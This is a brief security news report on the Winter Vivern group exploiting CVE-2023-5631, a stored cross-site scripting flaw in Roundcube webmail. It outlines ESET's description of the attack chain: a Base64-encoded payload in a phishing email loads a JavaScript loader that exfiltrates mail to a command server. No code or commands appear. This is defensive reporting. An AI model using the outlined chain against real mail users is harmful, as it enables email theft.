Security researchers discovered that the threat actor group Winter Vivern, also known as TA473 and UAC-0114, is exploiting a specific zero-day vulnerability.
The said vulnerability is CVE-2023-5631, with a CVSS score of 5.4 in Roundcube webmail software, which was exploited on October 11, 2023. ESET researcher Matthieu Faou emphasized the heightened threat level, stating that Winter Vivern previously relied on known vulnerabilities in Roundcube and Zimbra, with publicly available proofs-of-concept.
Winter Vivern Exploiting CVE-2023-5631 in Roundcube
Winter Vivern, aligned with the interests of Belarus and Russia, has targeted Ukraine, Poland, and government entities across Europe and India in recent months. Notably, this group exploited another Roundcube flaw (CVE-2020-35730) in August and September, making it the second nation-state group after APT28 to target the open-source webmail software.
The newly discovered vulnerability, CVE-2023-5631, is a stored cross-site scripting flaw. A fix for this issue was released on October 16, 2023. The attack involves a phishing message with a Base64-encoded payload in the HTML source code, leading to the execution of arbitrary JavaScript code when the victim views the message in a web browser.
ESET’s Faou detailed the attack chain, revealing that a specially crafted email message triggers the loading of arbitrary JavaScript code in the Roundcube user’s browser. The second-stage JavaScript (checkupdate.js) serves as a loader, enabling the execution of a final payload that facilitates the exfiltration of email messages to a command-and-control (C2) server.
Despite Winter Vivern’s relatively unsophisticated toolset, the group poses a significant threat due to its persistence, regular phishing campaigns, and the prevalence of internet-facing applications with known vulnerabilities. Faou emphasized the importance of prompt updates to mitigate the risk posed by this threat actor.